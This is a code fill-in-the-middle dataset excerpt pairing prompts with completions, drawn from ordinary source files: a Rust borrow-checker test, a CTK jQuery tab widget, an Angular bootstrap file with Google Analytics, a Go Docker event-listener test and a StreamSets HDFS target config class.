prompt
large_stringlengths
70
991k
completion
large_stringlengths
0
1.02k
<|file_name|>borrowck-borrow-from-expr-block.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. use std::gc::{Gc, GC}; fn borrow(x: &int, f: |x: &int|) { f(x) } <|fim▁hole|>fn test1(x: Gc<Box<int>>) { borrow(&*(*x).clone(), |p| { let x_a = &**x as *const int; assert!((x_a as uint) != (p as *const int as uint)); assert_eq!(unsafe{*x_a}, *p); }) } pub fn main() { test1(box(GC) box 22); }<|fim▁end|>
<|file_name|>Tab.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # # Copyright (C) 2010 CENATIC: Centro Nacional de Referencia de # Aplicacion de las TIC basadas en Fuentes Abiertas, Spain. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # # Neither the name of the CENATIC nor the names of its contributors # may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # You may contact the copyright holder at: Fundacion CENATIC, Avenida # Clara Campoamor, s/n. 06200 Almendralejo (Badajoz), Spain # # NOTE: This version of CTK is a fork re-licensed by its author. The # mainstream version of CTK is available under a GPLv2 license # at the Cherokee Project source code repository. # import string from Widget import Widget # WARNING # ------- # This class currently depends on a modified version of jQuery-UI. By # some reason I cannot still quite comprehend, there is no way to stop # jQuery's tab class from removing the active tab cookie when its # destroy() method is executed. # # The following patch has been applied to our jquery-ui copy. It just # removes three lines from the destroy() method, so the cookie is not # wiped out: # # - if (o.cookie) { # - this._cookie(null, o.cookie); # - } # # We ought to wrap the method to store the cookie value before the # method execution, and to restore it afterwards. In that way we could # use a standard version of jQuery-UI. HEADER = [ '<link type="text/css" href="/CTK/css/CTK.css" rel="stylesheet" />', '<script type="text/javascript" src="/CTK/js/jquery-ui-1.7.2.custom.min.js"></script>', '<script type="text/javascript" src="/CTK/js/jquery.cookie.js"></script>' ] HTML = """ <div id="tab_%(id)s"> %(html)s </div> <!-- %(id)s --> """ HTML_UL = """<ul class="ui-tabs-nav">%(li_tabs)s</ul>""" HTML_LI = """<li><a href="#%(tab_ref)s"><span>%(title)s</span></a></li>""" HTML_TAB = """ <div id="%(tab_ref)s"> %(widget)s </div> <!-- %(tab_ref)s --> """ JS_INIT = """ $("#tab_%(id)s").each(function() { var this_tab = $(this); var path_begin = location.href.indexOf('/', location.href.indexOf('://') + 3); var path = location.href.substring (path_begin); this_tab.find("ul li:first").addClass("ui-tabs-first"); this_tab.find("ul li:last").addClass("ui-tabs-last"); this_tab.tabs({ cookie: {path: path, name: 'opentab'} }).bind('tabsselect', function(event, ui) { /* Selection fixes for the tab theme */ var tabslen = this_tab.tabs('length'); var nprevtab = parseInt(get_cookie('opentab')) + 2; var nnexttab = parseInt(ui.index) +2; if (nprevtab < tabslen) { this_tab.find("li:nth-child("+ nprevtab +")").removeClass("ui-tabs-selected-next"); } else {<|fim▁hole|> this_tab.find("li:nth-child("+ nprevtab +")").removeClass("ui-tabs-selected-next-last"); } if (nnexttab < tabslen) { this_tab.find("li:nth-child("+ nnexttab +")").addClass("ui-tabs-selected-next"); } else { this_tab.find("li:nth-child("+ nnexttab +")").addClass("ui-tabs-selected-next-last"); } }); if (this_tab.tabs('option', 'selected') == 0) { if (this_tab.tabs('length') == 2) { this_tab.find("li:nth-child(2)").addClass("ui-tabs-selected-next-last"); } else { this_tab.find("li:nth-child(2)").addClass("ui-tabs-selected-next"); } } var ninitab = parseInt(get_cookie('opentab')) + 2; if (ninitab < this_tab.tabs('length')) { this_tab.find("li:nth-child("+ ninitab +")").addClass("ui-tabs-selected-next"); } else { this_tab.find("li:nth-child("+ ninitab +")").addClass("ui-tabs-selected-next-last"); } }); """ class Tab (Widget): def __init__ (self, props=None): Widget.__init__ (self) self._tabs = [] if props: self._props = props else: self._props = {} if not 'id' in self._props: self._props['id'] = 'widget%d'%(self.uniq_id) def Add (self, title, widget): assert type(title) == str assert isinstance(widget, Widget) self._tabs.append ((title, widget)) def Render (self): render = Widget.Render(self) id = self._props['id'] ul_html = '' tab_html = '' num = 1 for title, widget in self._tabs: r = widget.Render() # Keep record of dependencies render.js += r.js render.headers += r.headers render.helps += r.helps tab_ref = '' for c in title: if c in string.letters + string.digits: tab_ref += c else: tab_ref += '_' tab_ref += '-%d' %(num) # Render <ul> props = {'id': id, 'tab_ref': tab_ref, 'widget': r.html, 'title': title} ul_html += HTML_LI %(props) tab_html += HTML_TAB %(props) num += 1 # Render the whole thing tmp = HTML_UL %({'li_tabs': ul_html}) tmp += tab_html html = HTML %({'id': id, 'html': tmp}) props = {'id': id, 'tabs': html} render.html = html render.js += JS_INIT %(props) render.headers += HEADER return render<|fim▁end|>
<|file_name|>main.ts<|end_file_name|><|fim▁begin|>import { enableProdMode } from '@angular/core';<|fim▁hole|> import { AppModule } from './app/app.module'; import { environment } from './environments/environment'; if (environment.production) { enableProdMode(); // GA tracking document.write('<script async src="https://www.googletagmanager.com/gtag/js?id=UA-64617433-10"></script><script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag(\'js\', new Date()); gtag(\'config\', \'UA-64617433-10\'); </script>'); } platformBrowserDynamic().bootstrapModule(AppModule) .catch(err => console.error(err));<|fim▁end|>
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';
<|file_name|>eventlistener_test.go<|end_file_name|><|fim▁begin|>package eventlistener import ( "testing" "github.com/docker/docker/api/types" "golang.org/x/net/context" "fmt" "time" "github.com/docker/docker/api/types/events" ) //We simulate docker die event and expect to get the die container id in the tasks channel func TestEventListener(t *testing.T) { const labelToMonitor = "tugbot-test" tsk := make(chan string, 10) //l := NewEventListener(dockerClientMock{}, labelToMonitor, tsk) Register(dockerClientMock{}, labelToMonitor, tsk) select { case res := <-tsk: fmt.Println("we recieved the die container id via the tasks chan: ", res) <|fim▁hole|> case <-time.After(time.Second * 5): t.Error("we did not recieved the die container id on the tasks chan after 5 sec!") } } type dockerClientMock struct {} func (d dockerClientMock) Events(ctx context.Context, options types.EventsOptions) (<-chan events.Message, <-chan error) { eventsChan := make(chan events.Message, 10) errChan := make(chan error, 10) event := events.Message{ Type: "container", Action: "die", } eventsChan <- event return eventsChan, errChan } func (d dockerClientMock) Info(ctx context.Context) (types.Info, error) { panic("This function not suppose to be called") } func (d dockerClientMock) RegistryLogin(ctx context.Context, auth types.AuthConfig) (types.AuthResponse, error) { panic("This function not suppose to be called") } func (d dockerClientMock) DiskUsage(ctx context.Context) (types.DiskUsage, error) { panic("This function not suppose to be called") } func (d dockerClientMock) Ping(ctx context.Context) (bool, error) { panic("This function not suppose to be called") }<|fim▁end|>
<|file_name|>HdfsTargetConfigBean.java<|end_file_name|><|fim▁begin|>/* * Copyright 2017 StreamSets Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.streamsets.pipeline.stage.destination.hdfs; import com.codahale.metrics.Counter; import com.codahale.metrics.Meter; import com.google.common.annotations.VisibleForTesting; import com.streamsets.pipeline.api.ConfigDef; import com.streamsets.pipeline.api.ConfigDefBean; import com.streamsets.pipeline.api.Stage; import com.streamsets.pipeline.api.StageException; import com.streamsets.pipeline.api.Target; import com.streamsets.pipeline.api.ValueChooserModel; import com.streamsets.pipeline.api.el.ELEval; import com.streamsets.pipeline.api.el.ELEvalException; import com.streamsets.pipeline.api.el.ELVars; import com.streamsets.pipeline.api.el.SdcEL; import com.streamsets.pipeline.config.DataFormat; import com.streamsets.pipeline.config.TimeZoneChooserValues; import com.streamsets.pipeline.lib.el.DataUtilEL; import com.streamsets.pipeline.lib.el.RecordEL; import com.streamsets.pipeline.lib.el.TimeEL; import com.streamsets.pipeline.lib.el.TimeNowEL; import com.streamsets.pipeline.lib.hdfs.common.Errors; import com.streamsets.pipeline.lib.hdfs.common.HdfsBaseConfigBean; import com.streamsets.pipeline.stage.destination.hdfs.writer.ActiveRecordWriters; import com.streamsets.pipeline.stage.destination.hdfs.writer.RecordWriterManager; import com.streamsets.pipeline.stage.destination.lib.DataGeneratorFormatConfig; import org.apache.hadoop.conf.Configurable; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.io.SequenceFile; import org.apache.hadoop.io.compress.CompressionCodec; import org.apache.hadoop.security.UserGroupInformation; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.IOException; import java.net.URI; import java.security.PrivilegedExceptionAction; import java.time.ZoneId; import java.util.Date; import java.util.List; import java.util.TimeZone; import java.util.UUID; import java.util.concurrent.atomic.AtomicBoolean; public class HdfsTargetConfigBean extends HdfsBaseConfigBean { private static final Logger LOG = LoggerFactory.getLogger(HdfsTargetConfigBean.class); private static final int MEGA_BYTE = 1024 * 1024; @Override protected String getConfigBeanPrefix() { return "hdfsTargetConfigBean."; } @ConfigDef( required = false, type = ConfigDef.Type.STRING, defaultValue = "sdc-${sdc:id()}", label = "Files Prefix", description = "File name prefix", displayPosition = 105, group = "OUTPUT_FILES", displayMode = ConfigDef.DisplayMode.ADVANCED, elDefs = SdcEL.class ) public String uniquePrefix; @ConfigDef( required = false, type = ConfigDef.Type.STRING, label = "Files Suffix", description = "File name suffix e.g.'txt'", displayPosition = 106, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES", dependsOn = "fileType", triggeredByValue = {"TEXT", "SEQUENCE_FILE"} ) public String fileNameSuffix; @ConfigDef( required = true, type = ConfigDef.Type.BOOLEAN, defaultValue = "false", label = "Directory in Header", description = "The directory is defined by the '" + HdfsTarget.TARGET_DIRECTORY_HEADER + "' record header attribute instead of the Directory Template configuration property.", displayPosition = 107, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES" ) public boolean dirPathTemplateInHeader; @ConfigDef( required = true, type = ConfigDef.Type.STRING, defaultValue = "/tmp/out/${YYYY()}-${MM()}-${DD()}-${hh()}", label = "Directory Template", description = "Template for the creation of output directories. Valid variables are ${YYYY()}, ${MM()}, ${DD()}, " + "${hh()}, ${mm()}, ${ss()} and {record:value(“/field”)} for values in a field. Directories are " + "created based on the smallest time unit variable used.", displayPosition = 110, displayMode = ConfigDef.DisplayMode.BASIC, group = "OUTPUT_FILES", elDefs = {RecordEL.class, TimeEL.class, ExtraTimeEL.class}, evaluation = ConfigDef.Evaluation.EXPLICIT, dependsOn = "dirPathTemplateInHeader", triggeredByValue = "false" ) public String dirPathTemplate; @ConfigDef( required = true, type = ConfigDef.Type.MODEL, defaultValue = "UTC", label = "Data Time Zone", description = "Time zone to use to resolve directory paths", displayPosition = 120, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES" ) @ValueChooserModel(TimeZoneChooserValues.class) public String timeZoneID; @ConfigDef( required = true, type = ConfigDef.Type.STRING, defaultValue = "${time:now()}", label = "Time Basis", description = "Time basis to use for a record. Enter an expression that evaluates to a datetime. To use the " + "processing time, enter ${time:now()}. To use field values, use '${record:value(\"<filepath>\")}'.", displayPosition = 130, group = "OUTPUT_FILES", displayMode = ConfigDef.DisplayMode.ADVANCED, elDefs = {RecordEL.class, TimeEL.class, TimeNowEL.class}, evaluation = ConfigDef.Evaluation.EXPLICIT ) public String timeDriver; @ConfigDef( required = true, type = ConfigDef.Type.NUMBER, defaultValue = "0", label = "Max Records in File", description = "Number of records that triggers the creation of a new file. Use 0 to opt out.", displayPosition = 140, group = "OUTPUT_FILES", min = 0, displayMode = ConfigDef.DisplayMode.ADVANCED, dependsOn = "fileType", triggeredByValue = {"TEXT", "SEQUENCE_FILE"} ) public long maxRecordsPerFile; @ConfigDef( required = true, type = ConfigDef.Type.NUMBER, defaultValue = "0", label = "Max File Size (MB)", description = "Exceeding this size triggers the creation of a new file. Use 0 to opt out.", displayPosition = 150, group = "OUTPUT_FILES", min = 0, displayMode = ConfigDef.DisplayMode.ADVANCED, dependsOn = "fileType", triggeredByValue = {"TEXT", "SEQUENCE_FILE"} ) public long maxFileSize; @ConfigDef( required = true, type = ConfigDef.Type.STRING, defaultValue = "${1 * HOURS}", label = "Idle Timeout", description = "Maximum time for a file to remain idle. After no records are written to a file for the" + " specified time, the destination closes the file. Enter a number to specify a value in seconds. You" + " can also use the MINUTES or HOURS constants in an expression. Use -1 to opt out of a timeout.", group = "OUTPUT_FILES", displayPosition = 155, elDefs = {TimeEL.class}, evaluation = ConfigDef.Evaluation.EXPLICIT, displayMode = ConfigDef.DisplayMode.ADVANCED, dependsOn = "fileType", triggeredByValue = {"TEXT", "SEQUENCE_FILE"} ) public String idleTimeout; @ConfigDef( required = true, type = ConfigDef.Type.MODEL, defaultValue = "NONE", label = "Compression Codec", description = "", displayPosition = 160, group = "OUTPUT_FILES", displayMode = ConfigDef.DisplayMode.ADVANCED, dependsOn = "fileType", triggeredByValue = {"TEXT", "SEQUENCE_FILE"} ) @ValueChooserModel(CompressionChooserValues.class) public CompressionMode compression; @ConfigDef( required = true, type = ConfigDef.Type.STRING, defaultValue = "", label = "Compression Codec Class", description = "Use the full class name", displayPosition = 170, group = "OUTPUT_FILES", displayMode = ConfigDef.DisplayMode.ADVANCED, dependsOn = "compression", triggeredByValue = "OTHER" ) public String otherCompression; @ConfigDef( required = true, type = ConfigDef.Type.MODEL, defaultValue = "TEXT", label = "File Type", description = "", displayPosition = 100, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES" ) @ValueChooserModel(FileTypeChooserValues.class) public HdfsFileType fileType; @ConfigDef( required = true, type = ConfigDef.Type.STRING, defaultValue = "${uuid()}", label = "Sequence File Key", description = "Record key for creating Hadoop sequence files. Valid options are " + "'${record:value(\"<field-path>\")}' or '${uuid()}'", displayPosition = 180, group = "OUTPUT_FILES", dependsOn = "fileType", triggeredByValue = "SEQUENCE_FILE", displayMode = ConfigDef.DisplayMode.ADVANCED, evaluation = ConfigDef.Evaluation.EXPLICIT, elDefs = {RecordEL.class, DataUtilEL.class} ) public String keyEl; @ConfigDef( required = true, type = ConfigDef.Type.MODEL, defaultValue = "BLOCK", label = "Compression Type", description = "Compression type if using a CompressionCodec", displayPosition = 190, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES", dependsOn = "fileType", triggeredByValue = "SEQUENCE_FILE" ) @ValueChooserModel(HdfsSequenceFileCompressionTypeChooserValues.class) public HdfsSequenceFileCompressionType seqFileCompressionType; @ConfigDef( required = true, type = ConfigDef.Type.STRING, defaultValue = "${1 * HOURS}", label = "Late Record Time Limit (secs)", description = "Time limit (in seconds) for a record to be written to the corresponding directory, if the " + "limit is exceeded the record will be written to the current late records file. " + "If a number is used it is considered seconds, it can be multiplied by 'MINUTES' or 'HOURS', ie: " + "'${30 * MINUTES}'", displayPosition = 200, group = "LATE_RECORDS", displayMode = ConfigDef.DisplayMode.ADVANCED, elDefs = {TimeEL.class}, evaluation = ConfigDef.Evaluation.EXPLICIT ) public String lateRecordsLimit; @ConfigDef( required = true, type = ConfigDef.Type.BOOLEAN, defaultValue = "false", label = "Use Roll Attribute", description = "Closes the current file and creates a new file when processing a record with the specified roll attribute", displayPosition = 204, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES" ) public boolean rollIfHeader; @ConfigDef( required = true, type = ConfigDef.Type.STRING, defaultValue = "roll", label = "Roll Attribute Name", description = "Name of the roll attribute", displayPosition = 205, group = "OUTPUT_FILES", displayMode = ConfigDef.DisplayMode.ADVANCED, dependsOn = "rollIfHeader", triggeredByValue = "true" ) public String rollHeaderName; @ConfigDef( required = true, type = ConfigDef.Type.MODEL, defaultValue = "SEND_TO_ERROR", label = "Late Record Handling", description = "Action for records considered late.", displayPosition = 210, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "LATE_RECORDS" ) @ValueChooserModel(LateRecordsActionChooserValues.class) public LateRecordsAction lateRecordsAction; @ConfigDef( required = false, type = ConfigDef.Type.STRING, defaultValue = "/tmp/late/${YYYY()}-${MM()}-${DD()}", label = "Late Record Directory Template", description = "Template for the creation of late record directories. Valid variables are ${YYYY()}, ${MM()}, " + "${DD()}, ${hh()}, ${mm()}, ${ss()}.", displayPosition = 220, group = "LATE_RECORDS", dependsOn = "lateRecordsAction", triggeredByValue = "SEND_TO_LATE_RECORDS_FILE", displayMode = ConfigDef.DisplayMode.ADVANCED, elDefs = {RecordEL.class, TimeEL.class}, evaluation = ConfigDef.Evaluation.EXPLICIT ) public String lateRecordsDirPathTemplate; @ConfigDef( required = true, type = ConfigDef.Type.MODEL, label = "Data Format", description = "Data Format", displayPosition = 1, group = "DATA_FORMAT" ) @ValueChooserModel(DataFormatChooserValues.class) public DataFormat dataFormat; @ConfigDef( required = true, type = ConfigDef.Type.BOOLEAN, defaultValue = "true", label = "Validate Permissions", description = "When checked, the destination creates a test file in configured target directory to verify access privileges.", displayPosition = 230, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES" ) public boolean hdfsPermissionCheck; //Optional if empty file is created with default umask. @ConfigDef( required = false, type = ConfigDef.Type.STRING, elDefs = {RecordEL.class}, evaluation = ConfigDef.Evaluation.EXPLICIT, label = "Permissions Expression", description = "Expression that determines the target file permissions." + "Should be a octal/symbolic representation of the permissions.", displayPosition = 460, group = "DATA_FORMAT", displayMode = ConfigDef.DisplayMode.ADVANCED, dependsOn = "dataFormat", triggeredByValue = "WHOLE_FILE" ) public String permissionEL = ""; @ConfigDef( required = true, type = ConfigDef.Type.BOOLEAN, label = "Skip file recovery", defaultValue = "false", description = "Set to true to skip finding old temporary files that were written to and automatically recover them.", displayPosition = 1000, displayMode = ConfigDef.DisplayMode.ADVANCED, group = "OUTPUT_FILES" ) public boolean skipOldTempFileRecovery = false; @ConfigDefBean(groups = {"DATA_FORMAT"}) public DataGeneratorFormatConfig dataGeneratorFormatConfig; //private members private long lateRecordsLimitSecs; private long idleTimeSecs = -1; private ActiveRecordWriters currentWriters; private ActiveRecordWriters lateWriters; private ELEval timeDriverElEval; private CompressionCodec compressionCodec; private Counter toHdfsRecordsCounter; private Meter toHdfsRecordsMeter; private Counter lateRecordsCounter; private Meter lateRecordsMeter; //public API public void init(final Stage.Context context, List<Stage.ConfigIssue> issues) { boolean hadoopFSValidated = validateHadoopFS(context, issues); String fileNameEL = ""; lateRecordsLimitSecs = initTimeConfigs(context, "lateRecordsLimit", lateRecordsLimit, Groups.LATE_RECORDS, false, Errors.HADOOPFS_10, issues); if (idleTimeout != null && !idleTimeout.isEmpty()) { idleTimeSecs = initTimeConfigs(context, "idleTimeout", idleTimeout, Groups.OUTPUT_FILES, true, Errors.HADOOPFS_52, issues); } if (maxFileSize < 0) { issues.add( context.createConfigIssue( Groups.LATE_RECORDS.name(), getConfigBeanPrefix() + "maxFileSize", Errors.HADOOPFS_08 ) ); } if (maxRecordsPerFile < 0) { issues.add( context.createConfigIssue( Groups.LATE_RECORDS.name(), getConfigBeanPrefix() + "maxRecordsPerFile", Errors.HADOOPFS_09 ) ); } if (uniquePrefix == null) { uniquePrefix = ""; } if (fileNameSuffix == null) { fileNameSuffix = ""; } else { //File Suffix should not contain '/' or start with '.' if(fileType != HdfsFileType.WHOLE_FILE && (fileNameSuffix.startsWith(".") || fileNameSuffix.contains("/"))) { issues.add( context.createConfigIssue( Groups.HADOOP_FS.name(), getConfigBeanPrefix() + "fileNameSuffix", Errors.HADOOPFS_57 ) ); } } dataGeneratorFormatConfig.init( context, dataFormat, Groups.OUTPUT_FILES.name(), getConfigBeanPrefix() + "dataGeneratorFormatConfig", issues ); if (dataFormat == DataFormat.WHOLE_FILE || fileType == HdfsFileType.WHOLE_FILE) { validateStageForWholeFileFormat(context, issues); fileNameEL = dataGeneratorFormatConfig.fileNameEL; } SequenceFile.CompressionType compressionType = (seqFileCompressionType != null) ? seqFileCompressionType.getType() : null; try { switch (compression) { case OTHER: try { Class klass = Thread.currentThread().getContextClassLoader().loadClass(otherCompression); if (CompressionCodec.class.isAssignableFrom(klass)) { compressionCodec = ((Class<? extends CompressionCodec> ) klass).newInstance(); } else { throw new StageException(Errors.HADOOPFS_04, otherCompression); } } catch (Exception ex1) { throw new StageException(Errors.HADOOPFS_05, otherCompression, ex1.toString(), ex1); } break; case NONE: break; default: try { compressionCodec = compression.getCodec().newInstance(); } catch (IllegalAccessException | InstantiationException ex) { LOG.info("Error: " + ex.getMessage(), ex.toString(), ex); issues.add(context.createConfigIssue(Groups.OUTPUT_FILES.name(), null, Errors.HADOOPFS_48, ex.toString(), ex)); } break; } if (compressionCodec != null) { if (compressionCodec instanceof Configurable) { ((Configurable) compressionCodec).setConf(hdfsConfiguration); } } } catch (StageException ex) { LOG.info("Validation Error: " + ex.getMessage(), ex.toString(), ex); issues.add(context.createConfigIssue(Groups.OUTPUT_FILES.name(), null, ex.getErrorCode(), ex.toString(), ex)); } if(hadoopFSValidated){ try { // Creating RecordWriterManager for dirPathTemplate RecordWriterManager mgr = new RecordWriterManager( fs, hdfsConfiguration, uniquePrefix, fileNameSuffix, dirPathTemplateInHeader, dirPathTemplate, TimeZone.getTimeZone(ZoneId.of(timeZoneID)), lateRecordsLimitSecs, maxFileSize * MEGA_BYTE, maxRecordsPerFile, fileType, compressionCodec, compressionType, keyEl, rollIfHeader, rollHeaderName, fileNameEL, dataGeneratorFormatConfig.wholeFileExistsAction, permissionEL, dataGeneratorFormatConfig.getDataGeneratorFactory(), (Target.Context) context, "dirPathTemplate" ); if (idleTimeSecs > 0) { mgr.setIdleTimeoutSeconds(idleTimeSecs); } // We're skipping all hdfs-target-directory related validations if we're getting the configuration from header if(dirPathTemplateInHeader) { currentWriters = new ActiveRecordWriters(mgr); } else { // validate if the dirPathTemplate can be resolved by Els constants if (mgr.validateDirTemplate( Groups.OUTPUT_FILES.name(), "dirPathTemplate", getConfigBeanPrefix() + "dirPathTemplate", issues )) { String newDirPath = mgr.getDirPath(new Date()).toString(); if (validateHadoopDir( // permission check on the output directory context, getConfigBeanPrefix() + "dirPathTemplate", Groups.OUTPUT_FILES.name(), newDirPath, issues )) { currentWriters = new ActiveRecordWriters(mgr); } } } } catch (Exception ex) { LOG.info("Validation Error: " + Errors.HADOOPFS_11.getMessage(), ex.toString(), ex); issues.add(context.createConfigIssue(Groups.OUTPUT_FILES.name(), null, Errors.HADOOPFS_11, ex.toString(), ex)); } // Creating RecordWriterManager for Late Records if(lateRecordsDirPathTemplate != null && !lateRecordsDirPathTemplate.isEmpty()) { try { RecordWriterManager mgr = new RecordWriterManager( fs, hdfsConfiguration, uniquePrefix, fileNameSuffix, false, // Late records doesn't support "template directory" to be in header lateRecordsDirPathTemplate, TimeZone.getTimeZone(ZoneId.of(timeZoneID)), lateRecordsLimitSecs, maxFileSize * MEGA_BYTE, maxRecordsPerFile, fileType, compressionCodec, compressionType, keyEl, false, null, fileNameEL, dataGeneratorFormatConfig.wholeFileExistsAction, permissionEL, dataGeneratorFormatConfig.getDataGeneratorFactory(), (Target.Context) context, "lateRecordsDirPathTemplate" ); if (idleTimeSecs > 0) { mgr.setIdleTimeoutSeconds(idleTimeSecs); } // validate if the lateRecordsDirPathTemplate can be resolved by Els constants if (mgr.validateDirTemplate( Groups.OUTPUT_FILES.name(), "lateRecordsDirPathTemplate", getConfigBeanPrefix() + "lateRecordsDirPathTemplate", issues )) { String newLateRecordPath = mgr.getDirPath(new Date()).toString(); if (lateRecordsAction == LateRecordsAction.SEND_TO_LATE_RECORDS_FILE && lateRecordsDirPathTemplate != null && !lateRecordsDirPathTemplate.isEmpty() && validateHadoopDir( // permission check on the late record directory context, getConfigBeanPrefix() + "lateRecordsDirPathTemplate", Groups.LATE_RECORDS.name(), newLateRecordPath, issues )) { lateWriters = new ActiveRecordWriters(mgr); } } } catch (Exception ex) { issues.add(context.createConfigIssue(Groups.LATE_RECORDS.name(), null, Errors.HADOOPFS_17, ex.toString(), ex)); } } } timeDriverElEval = context.createELEval("timeDriver"); try { ELVars variables = context.createELVars(); RecordEL.setRecordInContext(variables, context.createRecord("validationConfigs")); TimeNowEL.setTimeNowInContext(variables, new Date()); context.parseEL(timeDriver); timeDriverElEval.eval(variables, timeDriver, Date.class); } catch (ELEvalException ex) { issues.add( context.createConfigIssue( Groups.OUTPUT_FILES.name(), getConfigBeanPrefix() + "timeDriver", Errors.HADOOPFS_19, ex.toString(), ex ) );<|fim▁hole|> if(rollIfHeader && (rollHeaderName == null || rollHeaderName.isEmpty())) { issues.add( context.createConfigIssue( Groups.OUTPUT_FILES.name(), getConfigBeanPrefix() + "rollHeaderName", Errors.HADOOPFS_51 ) ); } if (issues.isEmpty()) { try { userUgi.doAs(new PrivilegedExceptionAction<Void>() { @Override public Void run() throws Exception { getCurrentWriters().commitOldFiles(fs); if (getLateWriters() != null) { getLateWriters().commitOldFiles(fs); } return null; } }); } catch (Exception ex) { LOG.error("Exception while initializing bean configuration", ex); issues.add(context.createConfigIssue(null, null, Errors.HADOOPFS_23, ex.toString(), ex)); } toHdfsRecordsCounter = context.createCounter("toHdfsRecords"); toHdfsRecordsMeter = context.createMeter("toHdfsRecords"); lateRecordsCounter = context.createCounter("lateRecords"); lateRecordsMeter = context.createMeter("lateRecords"); } if (issues.isEmpty()) { try { // Recover previously written files (promote all _tmp_ to their final form). // // We want to run the recovery only if // * Not preview // * This is not a WHOLE_FILE since it doesn't make sense there (tmp files will be discarded instead) // * User explicitly did not disabled the recovery in configuration // * We do have the directory template available (e.g. it's not in header) // * Only for the first runner, since it would be empty operation for the others recoveryOldTempFile(context); } catch (Exception ex) { LOG.error(Errors.HADOOPFS_59.getMessage(), ex.toString(), ex); issues.add( context.createConfigIssue( Groups.OUTPUT_FILES.name(), getConfigBeanPrefix() + "dirPathTemplate", Errors.HADOOPFS_59, ex.toString(), ex ) ); } } } public void destroy() { LOG.info("Destroy"); try { if(userUgi != null) { userUgi.doAs((PrivilegedExceptionAction<Void>) () -> { try { //Don't close the whole files on destroy, we should only do it after //the file is copied (i.e after a record is written, the file will be closed) //For resume cases(i.e file copied fully but not renamed/ file partially copied) //we will overwrite the _tmp file and start copying from scratch if (currentWriters != null) { if (dataFormat != DataFormat.WHOLE_FILE) { currentWriters.closeAll(); } currentWriters.getWriterManager().issueCachedEvents(); } if (lateWriters != null) { if (dataFormat != DataFormat.WHOLE_FILE) { lateWriters.closeAll(); } lateWriters.getWriterManager().issueCachedEvents(); } } finally { if(fs != null) { fs.close(); fs = null; } } return null; }); } } catch (Exception ex) { LOG.warn("Error while closing FileSystem URI='{}': {}", hdfsUri, ex.toString(), ex); } } private long initTimeConfigs( Stage.Context context, String configName, String configuredValue, Groups configGroup, boolean allowNegOne, Errors errorCode, List<Stage.ConfigIssue> issues) { long timeInSecs = 0; try { ELEval timeEvaluator = context.createELEval(configName); context.parseEL(configuredValue); timeInSecs = timeEvaluator.eval(context.createELVars(), configuredValue, Long.class); if (timeInSecs <= 0 && (!allowNegOne || timeInSecs != -1)) { issues.add( context.createConfigIssue( configGroup.name(), getConfigBeanPrefix() + configName, errorCode ) ); } } catch (Exception ex) { issues.add( context.createConfigIssue( configGroup.name(), getConfigBeanPrefix() + configName, Errors.HADOOPFS_06, configuredValue, ex.toString(), ex ) ); } return timeInSecs; } Counter getToHdfsRecordsCounter() { return toHdfsRecordsCounter; } Meter getToHdfsRecordsMeter() { return toHdfsRecordsMeter; } Counter getLateRecordsCounter() { return lateRecordsCounter; } Meter getLateRecordsMeter() { return lateRecordsMeter; } String getTimeDriver() { return timeDriver; } ELEval getTimeDriverElEval() { return timeDriverElEval; } UserGroupInformation getUGI() { return userUgi; } protected ActiveRecordWriters getCurrentWriters() { return currentWriters; } protected ActiveRecordWriters getLateWriters() { return lateWriters; } @VisibleForTesting Configuration getHdfsConfiguration() { return hdfsConfiguration; } @VisibleForTesting CompressionCodec getCompressionCodec() throws StageException { return compressionCodec; } @VisibleForTesting long getLateRecordLimitSecs() { return lateRecordsLimitSecs; } 